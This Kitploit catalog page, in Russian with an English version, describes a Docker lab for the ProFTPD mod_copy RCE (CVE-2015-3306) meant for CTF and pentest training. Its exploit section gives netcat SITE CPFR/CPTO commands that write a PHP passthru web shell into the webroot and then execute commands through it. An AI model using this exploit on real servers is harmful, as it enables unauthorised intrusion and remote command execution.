Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE: настройка домашней лаборатории (Docker), простая в использовании для Red Teaming или тестирования на проникновение | Kitploit
Инструменты/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и ОбразованиеRed TeamingЛаборатории и Практика
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE: настройка домашней лаборатории (Docker), простая в использовании для Red Teaming или тестирования на проникновение

Репозиторий
9 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

АНГЛИЙСКАЯ ВЕРСИЯ НИЖЕ

ProFTPD 1.3.5 (mod_copy) — Лаборатория симуляции RCE

CVE20153306

Эта лаборатория разработана для имитации уязвимости CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE
Предназначена для изучения Web Shell Injection RCE через модуль mod_copy ProFTPD.


Особенности

  • ProFTPD 1.3.5 с уязвимостью
  • Полная поддержка mod_copy (SITE CPFR / SITE CPTO)
  • Поддержка анонимного FTP
  • Apache2 + PHP5 для имитации корневой веб-директории /var/www/html
  • Атакующий может использовать SITE CPFR/CPTO для копирования файлов в webroot с целью запуска RCE
  • Автоматическая генерация flag_RANDOM.txt при каждом запуске контейнера
  • Лаборатория для CTF / Red Team / Pentest Training

Структура директорий

root@kitploit:~
/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh

Использование (Запуск контейнера)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

Способ тестирования уязвимости CVE-2015-3306

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Открыть через браузер:

root@kitploit:~
http://<IP>/webshell.php?cmd=<команда>

Флаг

Хранится в:

root@kitploit:~
/tmp/flag_RANDOM.txt

Английская версия — ProFTPD 1.3.5 (mod_copy) Лаборатория RCE

Эта лаборатория симулирует CVE-2015-3306, используя ProFTPD 1.3.5 с mod_copy, что позволяет атакующим выполнять ProFTPD mod_copy Remote File Copy to RCE.


Особенности

  • Уязвимый ProFTPD 1.3.5, скомпилированный из исходников
  • Включён mod_copy (SITE CPFR + SITE CPTO)
  • Анонимный доступ по FTP
  • Apache2 + PHP5 для выполнения веб-шеллов
  • Автоматически генерируемый flag_RANDOM.txt при запуске контейнера
  • Идеально подходит для CTF, обучения и исследования эксплойтов

Пример тестирования эксплойта

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

Затем выполнить:

root@kitploit:~
http://<IP>/webshell.php?cmd=<команда>

Местоположение флага

root@kitploit:~
/tmp/flag_RANDOM.txt

Отказ от ответственности

Только для образовательных целей и авторизованного тестирования на проникновение.

Скачать инструмент